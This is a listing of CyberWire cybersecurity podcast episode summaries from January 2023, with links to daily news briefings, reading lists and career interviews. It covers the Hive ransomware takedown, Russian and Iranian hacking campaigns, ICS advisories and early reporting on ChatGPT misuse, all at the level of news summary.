    Ukraine Links Media Center Attack to Russian Intelligence (BankInfoSecurity)

    Latvia confirms phishing attack on Ministry of Defense, linking it to Russian hacking group (The Record from Recorded Future News)

    Russia knows US recruits hackers, trains Ukrainian IT-army — Deputy Foreign Minister (TASS)

    Taking down the Hive ransomware gang. (CyberWire)

    US puts a $10m bounty on Hive while Russia shuts down access (Register)

    Exploring Killnet’s Social Circles (Radware)

    Copycat Criminals mimicking Lockbit gang in northern Europe (Security Affairs)


    Charlie Moore: Pilot to head honcho in cyber. [Cyber Command] [Career Notes] Jan 29, 2023

    Our guest, Charlie Moore, is a recently retired USAF Lieutenant General who sits down to share his story from flying high in the air to becoming a bigwig in the cyber community. He was most recently the Deputy Commander of the United States Cyber Command, and also spent part of his career as a human factors engineer working on human interfaces for fighter aircraft. When he first began his Air Force career, he was a member of the last class entering into the Academy that was not issued desktop computers. Charlie discusses how this changed as the year went on and how that impacted his career both in and out of the military. Charlie worked for different companies over the years to further his career and his goals, and discusses how his flying career has helped him and says, "I was extremely passionate about the flying aspect of my career for 25 years and I became even more passionate about operating in this space." We thank Charlie for sharing his story with us.


    Interview with the AI, part one. [Special Editions] Jan 29, 2023

    Cybersecurity interview with ChatGPT.

    In part one of CyberWire’s Interview with the AI, Brandon Karpf interviews ChatGPT about topics related to cybersecurity. Rick Howard joins Brandon to analyze the conversation and discuss potential use cases for the cybersecurity community.

    ChatGPT is a chatbot launched by OpenAI and built on top of OpenAI’s GPT-3 family of large language models.

    Cyber questions answered by ChatGPT in part one of the interview.

    1. What were the most significant cybersecurity incidents up through 2021?
    2. What leads you to characterize these specific events as significant?
    3. What were the specific technical vulnerabilities associated with these incidents?
    4. Who were the cyber actors involved in each of these attacks?
    5. Do you think it's valuable to attribute cyber attacks to specific actors?

    Flagging firmware vulnerabilities. [Research Saturday] Jan 28, 2023

    Roya Gordon from Nozomi Networks sits down with Dave to discuss their research on "Vulnerabilities in BMC Firmware Affect OT/IoT Device Security." Researchers at Nozomi Networks have revealed that there are thirteen vulnerabilities that affect BMCs of Lanner devices based on the American Megatrends (AMI) MegaRAC SP-X.

    The research states "By abusing these vulnerabilities, an unauthenticated attacker may achieve Remote Code Execution (RCE) with root privileges on the BMC, completely compromising it and gaining control of the managed host." It also mentions what patches could come in the future to help fix these vulnerabilities.

    The research can be found here:

    • Vulnerabilities in BMC Firmware Affect OT/IoT Device Security – Part 1

    An update on the Hive ransomware takedown. More DDoS from Killnet. Advisories from CISA, and an addition to the Known Exploited Vulnerabilities Catalog. Jan 27, 2023

    An update on the takedown of the Hive ransomware gang, plus insights from CrowdStrike’s Adam Meyers. If you say you’re going to unleash the Leopards, expect a noisy call from Killnet. Our guest is ExtraHop CISO Jeff Costlow talking about nation-state attackers in light of ongoing Russian military operations. CISA has released eight ICS advisories, and the agency has also added an entry to its Known Exploited Vulnerabilities Catalog.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/18


    Selected reading.

    Cybercriminals stung as HIVE infrastructure shut down (Europol)

    U.S. Department of Justice Disrupts Hive Ransomware Variant (U.S. Department of Justice)

    Director Christopher Wray’s Remarks at Press Conference Announcing the Disruption of the Hive Ransomware Group (Federal Bureau of Investigation)

    Taking down the Hive ransomware gang. (CyberWire)

    US hacks back against Hive ransomware crew (BBC News)

    Cyberattacks Target Websites of German Airports, Admin (SecurityWeek)

    Delta Electronics CNCSoft ScreenEditor (CISA)

    Econolite EOS (CISA)

    Snap One Wattbox WB-300-IP-3 (CISA)

    Sierra Wireless AirLink Router with ALEOS Software (CISA)

    Mitsubishi Electric MELFA SD/SQ series and F-series Robot Controllers (CISA)

    Rockwell Automation products using GoAhead Web Server (CISA)

    Landis+Gyr E850 (CISA)

    Mitsubishi Electric MELSEC iQ-F, iQ-R Series (CISA)

    CISA Has Added One Known Exploited Vulnerability to Catalog (CISA)


    Remote monitoring and management tools abused. Russian and Iranian cyberespionage reported. The world according to the CIO. And if volume is your secret, maybe look for a better secret. Jan 26, 2023

    Joint advisory warns of remote monitoring and management software abuse. Iranian threat actors reported active against a range of targets. UK's NCSC warns of increased risk of Russian and Iranian social engineering attacks. A look at trends, as seen by CIOs. Carole Theriault ponders health versus privacy with former BBC guru Rory Cellan Jones. Kyle McNulty, host of the Secure Ventures podcast shares lessons from the cybersecurity startup community. And the DRAGONBRIDGE spam network is disrupted.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/17


    Selected reading.

    CISA, NSA, and MS-ISAC Release Advisory on the Malicious Use of RMM Software (CISA)

    Protecting Against Malicious Use of Remote Monitoring and Management Software (CISA)

    CISA: Federal agencies hacked using legitimate remote desktop tools (BleepingComputer)

    'Malicious' cyber attacks launched by groups connected to Iran's regime (ABC)

    Abraham's Ax Likely Linked to Moses Staff (Secureworks)

    SEABORGIUM and TA453 continue their respective spear-phishing campaigns against targets of interest (NCSC)

    NCSC: Russian and Iranian hackers targeting UK politicians, journalists (Computing)

    State of the CIO Study 2023: CIOs cement leadership role (Foundry)

    U.S. says it 'hacked the hackers' to bring down ransomware gang, helping 300 victims (Reuters)

    Over 50,000 instances of DRAGONBRIDGE activity disrupted in 2022 (Google TAG)


    CISA Alert AA23-025A – Protecting against malicious use of remote monitoring and management software. [CISA Cybersecurity Alerts] Jan 26, 2023

    CISA, NSA, and the MS-ISAC are releasing this alert to warn network defenders about malicious use of legitimate remote monitoring and management software.

    AA23-025A Alert, Technical Details, and Mitigations

    For a downloadable copy of IOCs, see AA23-025.stix

    Silent Push uncovers a large trojan operation featuring Amazon, Microsoft, Geek Squad, McAfee, Norton, and Paypal domains

    No-cost cyber hygiene services: Cyber Hygiene Services and Ransomware Readiness Assessment.

    See CISA Insights Mitigations and Hardening Guidance for MSPs and Small- and Mid-sized Businesses for guidance on hardening MSP and customer infrastructure.

    U.S. DIB sector organizations may consider signing up for the NSA Cybersecurity Collaboration Center’s DIB Cybersecurity Service Offerings, including Protective Domain Name System services, vulnerability scanning, and threat intelligence collaboration for eligible organizations. For more information on how to enroll in these services, email dib_defense@cyber.nsa.gov

    To report incidents and anomalous activity or to request incident response resources or technical assistance related to these threats, contact CISA at report@cisa.gov, or call (888) 282-0870, or report incidents to your local FBI field office.


    TA444 and crypto theft on behalf of the Dear Successor. CryptoAPI spoofing vulnerability described. New Python-based malware campaign. User headspace. Tanks vs. hacktivists. Jan 25, 2023

    How do the North Koreans get away with it? They do run their cyber ops like a creepy start-up business. A spoofing vulnerability is discovered in Windows CryptoAPI. Python-based malware is distributed via phishing. MacOS may have a reputation for threat-resistance, but users shouldn't get cocky. DevSecOps survey results show tension between innovation and security. Russian hacktivist auxiliaries hit German targets. Tim Starks from the Washington Post Cyber 202 shares insights from his interview with Senator Warner. Our guest is Keith McCammon of Red Canary to discuss cyber accessibility. And private sector support for Ukraine's cyber defense.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/16


    Selected reading.

    TA444: The APT Startup Aimed at Acquisition (of Your Funds) (Proofpoint)

    Exploiting a Critical Spoofing Vulnerability in Windows CryptoAPI (Akamai)

    Securonix Security Advisory: Python-Based PY#RATION Attack Campaign Leverages Fernet Encryption and Websockets to Avoid Detection (Securonix)

    BlackBerry's Inaugural Quarterly Threat Intelligence Report Reveals Threat Actors Launch One Malicious Threat Every Minute (BlackBerry)

    Global CIO Report Reveals Growing Urgency for Observability and Security to Converge (Dynatrace)

    Russian 'hacktivists' briefly knock German websites offline (Reuters)

    How Microsoft is helping Ukraine’s cyberwar against Russia (Computerworld)

    CISA Releases Two Industrial Control Systems Advisories (CISA)


    Cyber Marketing Con 2022: From the horse’s mouth: CISO Q&A on solving the cyber marketer’s dilemma. [Special Editions] Jan 25, 2023

    At the 2022 Cyber Marketing Con, the CyberWire presented a CISO Q&A panel session on how to help cyber marketers reach CISOs and other security executives in the industry. The panel included Rick Howard, CSO of N2K Networks, Jaclyn Miller, Head of InfoSec and IT at DispatchHealth, Ted Wagner, CISO of SAP NS2, and was moderated by board director and operating partner Michelle Perry.

    Listen in as the panel discusses:

    • What works and doesn’t work in getting a security executive’s attention.
    • Message trust, message fatigue, and what you can do about it.
    • Trusted information sources and how security executives use them.
    • Positioning and messaging that is actually meaningful to decision makers.
    • The security executive’s purchasing behavior and why skepticism is the driving force.


    Stay tuned until the end to hear us answer some additional bonus questions submitted by attendees.


    Disentangling cybercrime from cyberespionage. A threat to the IoT supply chain. What do you do with the hacktivists when they stop being hacktivists? A retired FBI Special Agent is indicted. Jan 24, 2023

    DragonSpark conducts "opportunistic" cyberattacks in East Asia. ProxyNotShell and OWASSRF exploit chains target Microsoft Exchange servers. The IoT supply chain is threatened by exploitation of Realtek Jungle SDK vulnerability. CISA adds an entry to its Known Exploited Vulnerabilities Catalog. A Cisco study finds organizations see positive returns from investment in privacy. What's the hacktivist's postwar future? Joe Carrigan tracks a romance scam targeting seniors. Our guest is Pete Lund of OPSWAT to discuss the security of removable media devices. And a retired G-Man is indicted on multiple charges.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/15


    Selected reading.

    DragonSpark | Attacks Evade Detection with SparkRAT and Golang Source Code Interpretation (SentinelOne)

    Technical Advisory: Proxy*Hell Exploit Chains in the Wild (Bitdefender)

    Realtek SDK Vulnerability Attacks Highlight IoT Supply Chain Threats (Unit 42)

    CISA Adds One Known Exploited Vulnerability to Catalog (CISA)

    2023 Data Privacy Benchmark Study (Cisco)

    Hacktivism Is a Risky Career Path (WIRED)

    Retired FBI Executive Charged With Concealing $225,000 In Cash Received From An Outside Source (Department of Justice, U.S. Attorney’s Office, District of Columbia)

    Former Special Agent In Charge Of The New York FBI Counterintelligence Division Charged With Violating U.S. Sanctions On Russia (Department of Justice, U.S. Attorney’s Office, Southern District of New York)

    Former Senior F.B.I. Official in New York Charged With Aiding Oligarch (New York Times)


    Contractor error behind FAA outage. OneNote malspam. Vastflux ad campaign disrupted. Ukraine moves closer to CCDCOE membership. Alerts for gamblers and gamers. Jan 23, 2023

    The FAA attributes its January NOTAM outage. Malicious OneNote attachments are appearing in phishing campaigns. The Vastflux ad campaign has been disrupted. Ukraine moves toward closer cybersecurity collaboration with NATO. Rick Howard considers the best of 2022. Deepen Desai from Zscaler looks at VPN Risk. And, finally, we’re betting you want alerts for sports book customers and online gamers.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/14


    Selected reading.

    FAA Says Contractor Unintentionally Caused Outage That Disrupted Flights (Wall Street Journal)

    Not a cyberattack, but an IT failure: the FAA's NOTAM outage. (CyberWire)

    Hackers now use Microsoft OneNote attachments to spread malware (BleepingComputer)

    Traffic signals: The VASTFLUX Takedown (HUMAN Security)

    Ukraine signs agreement to join NATO cyber defense center (The Record from Recorded Future News)

    FanDuels warns of data breach after customer info stolen in vendor hack (BleepingComputer)

    Industry looks at the MailChimp data incident. (CyberWire)

    PSA: Don’t play GTA Online on PC right now (Video Games)

    You might not want to play GTA Online right now due to security vulnerabilities (RockPaperShotgun)

    Riot Games hacked, delays game patches after security breach (BleepingComputer)

    Riot hit by ‘social engineering attack’ that will affect patch cadence for multiple titles (Dot Esports)


    Miriam Wugmeister: Technology's not as complicated as you think. [Data Security] [Career Notes] Jan 22, 2023

    Miriam Wugmeister, co-chair of Morrison & Foerster’s Privacy and Data Security practice, sits down to share her in-depth experience and understanding of privacy and data security laws, obligations, and practices across a wide range of industries. She talks about how she grew up not knowing exactly what she wanted to get into as a profession, starting off as a chemical engineering major in college before switching to philosophy. She then got asked to work on a project relating to a company’s privacy and fell in love with the subject matter, deciding then to pursue it as a career. Miriam mentions how technology is not as complicated as tech people might have you think. She hopes she can advertise a tech degree for young women and men looking to get into the field, as well as making sure she "encourages women and diverse lawyers to, uh, come into this area to thrive." We thank Miriam for sharing her story with us.


    The power of web data in cybersecurity. [CyberWire-X] Jan 22, 2023

    The public web data domain is a fancy way to say that there is a lot of information sitting on websites around the world that is freely available to anybody who has the initiative to collect it and use it for some purpose. When you do that collection, intelligence groups typically refer to it as open source intelligence, or OSINT. Intelligence groups have been conducting OSINT operations for over a century if you consider books and newspapers to be one source of this kind of information. In the modern day, hackers conduct OSINT operations in order to recon their potential victims by collecting email addresses, personal information, IP addresses, software versions, network configurations, and, if they are lucky, login credentials for websites and social media platforms. The question is, how can the good guys use these techniques to improve their security posture or maybe help the business in some kind of material way?

    On this episode of CyberWire-X, the CyberWire’s Rick Howard and Dave Bittner discuss OSINT operations to improve your security posture with guests Steve Winterfeld, Hash Table member and Advisory CISO for Akamai, and Or Lenchner, CEO at our episode sponsor Bright Data.


    Billbug infests government agencies. [Research Saturday] Jan 21, 2023

    Brigid O. Gorman from Symantec's Threat Hunter Team joins Dave to discuss their report "Billbug - State-sponsored Actor Targets Cert Authority and Government Agencies in Multiple Asian Countries." The team has discovered that state-sponsored actors compromised a digital certificate authority in an Asian country during a campaign in which multiple government agencies were also targeted.

    The research states they believe Billbug, a long-established advanced persistent threat (APT) group, has been active since about 2009. They say "In activity documented by Symantec in 2019, we detailed how the group was using a backdoor known as Hannotog (Backdoor.Hannotog) and another backdoor known as Sagerunex (Backdoor.Sagerunex). Both these tools were also seen in this more recent activity."

    The research can be found here:

    • Billbug: State-sponsored Actor Targets Cert Authority, Government Agencies in Multiple Asian Countries

    Ransomware in Costa Rica. Cyberespionage against unpatched FortiOS instances. Credential stuffing PayPal, breaching T-Mobile. Utility business systems hit. Hackathons and phishing in Russia. Jan 20, 2023

    Ransomware hits Costa Rican government systems, again. A Chinese threat actor deploys the BOLDMOVE backdoor against unpatched FortiOS. Credential stuffing afflicts PayPal users. T-Mobile discloses a data breach. A cyberattack hits a remote Canadian utility. The Wagner Group sponsors a hackathon. Malek Ben Salem from Accenture describes prompt injection for chatbots. Our guest is Paul Martini of iboss with insights on Zero Trust. And the FSB’s Gamaredon APT runs a hands-on Telegram phishing campaign against Ukrainian targets.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/13


    Selected reading.

    Bolster Your Company Defenses With Zero Trust Edge (Forrester)

    MICITT detects a computer incident at the MOPT, which has already been contained (MICITT)

    MOPT keeps all of its services available in person (MICITT)

    Costa Rica’s Ministry of Public Works and Transport crippled by ransomware attack (Record)

    Suspected Chinese Threat Actors Exploiting FortiOS Vulnerability (CVE-2022-42475) (Mandiant)

    Attackers Crafted Custom Malware for Fortinet Zero-Day (Dark Reading)

    Chinese hackers used recently patched FortiOS SSL-VPN flaw as a zero-day in October (Security Affairs)

    PayPal accounts breached in large-scale credential stuffing attack (BleepingComputer)

    PayPal Confirms Over 34,000 Customer Accounts Were Breached (EcommerceBytes)

    35,000 PayPal accounts hacked, and users could've prevented it (PCWorld)

    Thousands Of PayPal Accounts Hacked—Is Yours One Of Them? (Forbes)

    Nearly 35,000 PayPal users had SSNs, tax info leaked during December cyberattack (The Record from Recorded Future News)

    T-Mobile Says Hacker Stole Data for 37 Million Customers (Bloomberg)

    T-Mobile Says Hackers Stole Data on About 37 Million Customers (Wall Street Journal)

    T-Mobile Says Hackers Used API to Steal Data on 37 Million Accounts (SecurityWeek)

    Cyberattack hits Nunavut's Qulliq Energy Corp. (CBC News)

    Nunavut power utility’s servers hit by cyber attack (IT World Canada)

    Russian War Report: Russian hacker wanted by the FBI reportedly wins Wagner hackathon prize (Atlantic Council)

    Gamaredon (Ab)uses Telegram to Target Ukrainian Organizations (Blackberry)

    Gamaredon Group Launches Cyberattacks Against Ukraine Using Telegram (The Hacker News)

    Hitachi Energy PCU400 (CISA)

    Bolster Your Company Defenses With Zero Trust Edge (iBoss)


    Criminal-on-criminal action in the dark web. The cyber phases of the hybrid war heat up. ICS vulnerabilities. Codespaces and malware servers. Blank-image attacks. Social engineering. Jan 19, 2023

    A hostile takeover of the Solaris contraband market. Ukraine warns that Russian cyberattacks continue. An overview of 2H 2022 ICS vulnerabilities. Codespaces accounts can act as malware servers. Blank-image attacks. Campaigns leveraging HR policy themes. Dinah Davis from Arctic Wolf has tips for pros for security at home. Our guest, Gerry Gebel from Strata Identity, describes a new open source standard that aims to unify cloud identity platforms. And travel-themed phishing increases.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/12


    Selected reading.

    Friday the 13th on the Dark Web: $150 Million Russian Drug Market Solaris Hacked by Rival Market Kraken (Elliptic Connect)

    Russia-linked drug marketplace Solaris hacked by its rival (The Record from Recorded Future News)

    Cyber-attacks have tripled in past year, says Ukraine’s cybersecurity agency (The Guardian)

    Ukraine: Russians Aim to Destroy Information Infrastructure (Gov Info Security)

    Ukraine says Russia is coordinating missile strikes, cyberattacks and information operations (The Record by Recorded Future)

    ICS Vulnerabilities and CVEs: Second Half of 2022 (SynSaber)

    Abusing a GitHub Codespaces Feature For Malware Delivery (Trend Micro)

    The Blank Image Attack (Avanan)

    Phishing Attacks Pose as Updated 2023 HR Policy Announcements (Abnormal Security)

    Spammers phish eager vacationers with travel-themed lures, Bitdefender Antispam Lab warns (Bitdefender)


    ICS security–vulnerabilities, mitigations, and threats. A Chinese APT prospects Iranian targets. The persistence of nuisance-level hacktivism. And war takes a toll on the criminal economy. Jan 18, 2023

    CISA adds to its Known Exploited Vulnerability Catalog. Attacks against industrial systems. DNV is recovering from ransomware. Chinese cyberespionage is reported against Iran. The persistence of nuisance-level hacktivism. Robert M. Lee from Dragos outlines pipeline security. Our guest is Yasmin Abdi from Snap on bringing her team up to speed with zero trust. And a side-effect of Russia's war: a drop in paycard fraud.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/11


    Selected reading.

    Bolster Your Company Defenses With Zero Trust Edge (iBoss)

    CISA Adds One Known Exploited Vulnerability to Catalog (CISA)

    GE Digital Proficy Historian (CISA)

    Mitsubishi Electric MELSEC iQ-F, iQ-R Series (CISA)

    Siemens SINEC INS (CISA)

    Contec CONPROSYS HMI System (CHS) Update A (CISA)

    Nozomi Networks Researchers Take a Deep Look into the ICS Threat Landscape (Nozomi Networks)

    A look at IoT/ICS threats. (CyberWire)

    DNV's fleet management software recovering from ransomware attack. (CyberWire)

    DNV says up to 1,000 ships affected by ransomware attack (Computing)

    Ransomware attack on maritime software impacts 1,000 ships (The Record from Recorded Future News)

    Chinese Playful Taurus Activity in Iran (Unit 42)

    Playful Taurus: a Chinese APT active against Iran. (CyberWire)

    Russian hackers allegedly tried to disrupt a Ukrainian press briefing about cyberattacks (Axios)

    Russia's Ukraine War Drives 62% Slump in Stolen Cards (Infosecurity Magazine)

    Annual Payment Fraud Intelligence Report: 2022 (Recorded Future)


    Phishing campaigns (one uses mobilization as phishbait). Credential-stuffing attack affects Norton LifeLock users. Trends in security. Azure SSRF issues fixed. Calls for a “digital UN.” Jan 17, 2023

    A phishing campaign impersonates DHL. Conscription and mobilization provide criminals with phishbait for Russian victims. Norton LifeLock advises customers that their accounts may have been compromised. Trends in data protection. Veracode's report on the state of software application security. Ben Yelin looks at NSO group’s attempt at state sovereignty. Ann Johnson from Afternoon Cyber Tea speaks with Microsoft’s Chris Young about the importance of the security ecosystem. And Ukraine calls for a "digital United Nations."


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/10


    Selected reading.

    Cloud 9: Top Cloud Penetration Testing Tools (Bishop Fox)

    Our Top Favorite Fuzzer crowdsourcing pen testing tools (Bishop Fox)

    DHL Phishing Attack. Simply Delivered. (ArmorBlox)

    Credential phishing campaign impersonates DHL. (CyberWire)

    Phishing scam invites Russian Telegram users to check ‘conscription lists’ to see if they’ll be drafted in February (Meduza)

    NortonLifeLock warns that hackers breached Password Manager accounts (BleepingComputer)

    Norton LifeLock says thousands of customer accounts breached (TechCrunch)

    NortonLifeLock notifies thousands of users about compromised Password Manager accounts (Computing)

    Data Protection Trends Report 2023 (Veeam)

    Trends in data protection. (CyberWire)

    How Orca Found Server-Side Request Forgery (SSRF) Vulnerabilities in Four Different Azure Services (Orca Security)

    Orca describes four Azure vulnerabilities. (CyberWire)

    State Of Software Security (Veracode)

    A look at the state of software security. (CyberWire)

    Ukraine calls for ‘Cyber United Nations’ amid Russian attacks (POLITICO)


    Andy Greenberg Interview: Tracers in the Dark. [CSO Perspectives] Jan 16, 2023

    Rick Howard, N2K’s CSO and the CyberWire’s Chief Analyst, and Senior Fellow, interviews Andy Greenberg, Senior Writer at WIRED, regarding his new book, “Tracers in the Dark.”


    Gene Fay: Lead from the front. [CEO] [Career Notes] Jan 15, 2023

    Gene Fay, CEO of ThreatX, sits down to share his experience rising through the ranks to get to where he is today. He shares how even at a young age he wanted to work in an office and become a businessman, though at the time he did not understand what that entailed. After college he took a job in a business that was revolutionizing video editing for post-production studios and TV stations, where he really started to learn about technology. Gene talks about leading from the front and how a good leader will always do so, even if he has to lead from two different fronts. He said "it's kind of the two fronts, sometimes you've gotta put on the leadership face, and believe it, that, that you can get, and we can get through any situation, cuz sometimes you're, your gut feelings are, might be wrong and, or it's a moment in time and if you can help the team grind through that situation, it does get better." We thank Gene for sharing his story with us.


    DUCKTAIL waddles back again. [Research Saturday] Jan 14, 2023

    Mohammad Kazem Hassan Nejad from WithSecure joins Dave to discuss the team’s research, “DUCKTAIL returns - Underneath the ruffled feathers.” DUCKTAIL is a financially motivated malware operation that targets individuals and businesses operating on the Facebook Ads and Business platform.

    The research states “The malware is designed to steal browser cookies and take advantage of authenticated Facebook sessions to steal information from the victim's Facebook account.” WithSecure has found that after a short hiatus, DUCKTAIL has returned with slight changes in their mode of operation.

    The research can be found here:

    • DUCKTAIL returns: Underneath the ruffled feathers

    Updates on the hybrid war, and on the incidents at the Royal Mail, the FAA, and the Guardian. Royal ransomware exploits Citrix vulnerability. CISA’s annual report is out. Jan 13, 2023

    GitHub disables NoName accounts. Russia dismisses reports of cyberespionage attempts against US National Laboratories. The Royal Mail cyber incident is now identified as ransomware attack. An update on the NOTAM issues that interfered with civil aviation. A Citrix vulnerability is exploited by ransomware group. CISA publishes its annual report. Bryan Vorndran of the FBI Cyber Division calibrates expectations with regard to the IC3. Our guest is Kayne McGladrey with insights on 2023 from the IEEE. And Positive Hack Days and the growing isolation of Russia's cyber sector.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/9


    Selected reading.

    Impact of Technology in 2023 and Beyond (IEEE)

    Ukraine at D+323: Fighting in Soledar, and industrial mobilization. (CyberWire)

    GitHub disables pro-Russian hacktivist DDoS pages (CyberScoop)

    Russia criticises Reuters story on Russian hackers targeting U.S. nuclear scientists (Reuters)

    Royal Mail cyber incident now identified as ransomware attack. (CyberWire)

    Not a cyberattack, but an IT failure. (CyberWire)

    The Guardian breach and news media as targets. (CyberWire)

    Citrix vulnerability exploited by ransomware group. (CyberWire)

    2022 Year In Review (CISA)

    Russia’s largest hacking conference reflects isolated cyber ecosystem (Brookings)


    Trojanized VPN installers circulate in Iran. A trip down the static expressway. Hacktivism-for-profit. IT incidents disrupt NOTAMs and Royal Mail. HR phishbait. Jan 12, 2023

    Iranian VPN users are afflicted by Trojanized installation apps. Phishing on the static expressway. NoName057(16) hacktivist auxiliaries target NATO. Yesterday’s flight outage appears not to have been caused by a cyberattack. Royal Mail is disrupted by a "cyber incident." Carole Theriault thinks Meta needs to step up their game when blocking financial scams. Our guest is Mark Sasson from Pinpoint Search Group to discuss why cybersecurity may no longer be a candidate-driven market. And HR phishbait dangles raises, and some employees bite.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/8


    Selected reading.

    EyeSpy - Iranian Spyware Delivered in VPN Installers (Bitdefender Labs)

    Phishing on the Static Expressway. (CyberWire)

    NoName057(16) - The Pro-Russian Hacktivist Group Targeting NATO (SentinelOne)

    Not a cyberattack, but an IT failure. (CyberWire)

    FAA NOTAM Statement (FAA)

    Canadian Pilot-Alert System Reports Outage Hours After U.S. Grounding Order (Wall Street Journal)

    US air travel resumes but thousands of flights delayed after planes grounded - live updates (The Telegraph)

    US Flights Latest: Departures Resume After FAA Lifts Ground Stop (Bloomberg)

    Royal Mail suffers ‘severe service disruption’ after cyber incident (Glasgow Times)

    Royal Mail issues major disruption warning after 'cyber incident' (Computing)

    Parcels and letters stuck in limbo as Royal Mail is hit by a suspected hack (The Telegraph)

    Cyber Incident Hits UK Postal Service, Halts Overseas Mail (SecurityWeek)


    Notes on patches. Dark Pink industrial cyberespionage campaign in Asia. Kinsing cryptojacking. Hacktivist DDoS against Iran. Healthcare cyber risk management. Pokémon NFTs. Jan 11, 2023

    Patch Tuesday. CISA releases two ICS Advisories and makes some additions to its Known Exploited Vulnerabilities Catalog. Dark Pink APT is active against Asian targets. Kinsing cryptojacking targets Kubernetes instances. Ukrainian hacktivists conduct DDoS against Iranian sites. Risk exposure and a hospital's experience with ransomware. The Health3PT initiative seeks to manage 3rd-party risk. Tim Starks from the Washington Post’s Cyber 202 on cyber rising to the level of war crime. Our guest is Connie Stack, CEO of Next DLP, on the path to leadership within cyber for women. And phishing with Pokémon NFTs.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/7


    Selected reading.

    The Daily 202 (Latest Cybersecurity 202)

    Microsoft Releases January 2023 Security Updates (CISA)

    Adobe Releases Security Updates for Multiple Products (CISA)

    Black Box KVM (CISA)

    Delta Electronics InfraSuite Device Master (CISA)

    Known Exploited Vulnerabilities Catalog (CISA)

    Dark Pink (Group-IB)

    New Dark Pink APT group targets govt and military with custom malware (BleepingComputer)

    Kinsing cryptojacking. (CyberWire)

    Ukraine at D+321: "Difficult in places." (CyberWire)

    Iranian websites impacted by pro-Ukraine DDoS attacks (SC Media)

    Ransomware attack against SickKids said to be unusual. (CyberWire)

    Health3PT seeks a uniform approach to healthcare supply chain issues. (CyberWire)

    Breaking the glass ceiling: My journey to close the leadership gap. (CyberWire, Creating Connections)

    Pokémon NFTs used as malware vectors. (CyberWire)


    Some trends in threats and defense. The possibility of cyber war crimes. RSAC innovation showcases are open for application. And common KEVs in the financial sector. Jan 10, 2023

    A look back at ransomware in 2022. Lessons from Russia's war: crooks, hacktivists, and auxiliaries. Cyberattacks as war crimes. The state of SSE adoption. RSA Conference 2023 opens applications for the Launch Pad and the Innovation Sandbox. Joe Carrigan looks at online scams targeting military members. Our guest is Richard Caralli from Axio on the State of Ransomware Preparedness. And the most common known exploited vulnerabilities affecting the financial sector.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/6


    Selected reading.

    Ransomware trends: 2022. (CyberWire)

    State of Ransomware Preparedness Research Study: 2022 (Axio)

    Kyiv argues Russian cyberattacks could be war crimes (POLITICO)

    Ukraine official says Russian cyberattacks on its energy network could equate to war crimes (Yahoo)

    Ukraine war and geopolitics fuelling cybersecurity attacks - EU agency (EU Reporter)

    Industry-first research from Axis Security finds 65% percent of organizations plan to adopt a Security Service Edge platform within next two years (Axis Security)

    RSAC Launch Pad is Back! (RSA Conference 2023)

    The Best in Innovation Programs Starts Here (RSA Conference 2023)

    Top KEVs in the U.S. Financial Services Sector (LookingGlass)


    Social engineering shenanigans, by both crooks and spies. Suing social media over alleged mental health damages. And how to earn an “F.” Jan 09, 2023

    Telegram impersonation affects a cryptocurrency firm. Phishing with Facebook termination notices. Russian phishing continues to target Moldova. The IEEE on the impact of technology in 2023. Glass ceilings in tech leadership. Seattle Schools sue social media platforms. Malek Ben Salem from Accenture explains coding models. Our guest is Julie Smith, identity security leader and executive director at IDSA, with insights on identity and security strategies. And dealing with the implications of ChatGPT.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/5


    Selected reading.

    Impact of Technology in 2023 and Beyond (IEEE)

    Telegram insider server access offered to Dark Web customers (SafetyDetectives)

    Moldova's government hit by flood of phishing attacks (The Record from Recorded Future News)

    OPWNAI : Cybercriminals Starting to Use ChatGPT (Check Point Research)

    Hackers exploiting ChatGPT to write malicious codes to steal your data (Business Standard)

    Armed With ChatGPT, Cybercriminals Build Malware And Plot Fake Girl Bots (Forbes)

    Hackers Exploiting OpenAI’s ChatGPT to Deploy Malware (HackRead)

    Cybercriminals are already using ChatGPT to own you (SC Media)

    Threat Report: Impersonation Detected in Telegram Chats to Deliver Malware (Safeguard Cyber)

    Seattle schools sue tech giants over social media harm (ABC News)

    Seattle Public Schools sues TikTok, YouTube, Instagram and others, seeking compensation for youth mental health crisis (GeekWire)

    Ghost Writer: Microsoft Looks to Add OpenAI’s Chatbot Technology to Word, Email (The Information)

    Microsoft plans to use ChatGPT in Bing. Here's why it could be a threat to Google. (Freethink)

    ChatGPT Hits Ethical Roadblock; Blocked (Analytics India Magazine)

    A College Kid Built an App That Sniffs Out Text Penned by AI (The Daily Beast)

    A Princeton student built an app which can detect if ChatGPT wrote an essay to combat AI-based plagiarism (Business Insider)


    Teresa Rothaar: Outwork the competition. [Analyst] [Career Notes] Jan 08, 2023

    Teresa Rothaar, a governance, risk, and compliance (GRC) analyst at Keeper Security, sits down to share her story, from performer to cyber. As a young girl she fell in love with writing and experimented with fanfiction, which made her want to grow up to work in the arts. After attending college she found that she was good at math, lighting the way for her to start her cyber career. Teresa moved to being a writer at Keeper, then found she wanted to spread out and try more, so she ended up becoming an analyst while still writing on the side. She quotes something David Duchovny once said in an interview, explaining how sometimes you need to keep your head down and outwork others. Teresa said this resonated with her, saying, "that's how I went from a foreclosure box on the porch to where I am now. I have a good job and, and I have a career and I have a really good career and I absolutely love it." We thank Teresa for sharing her story.


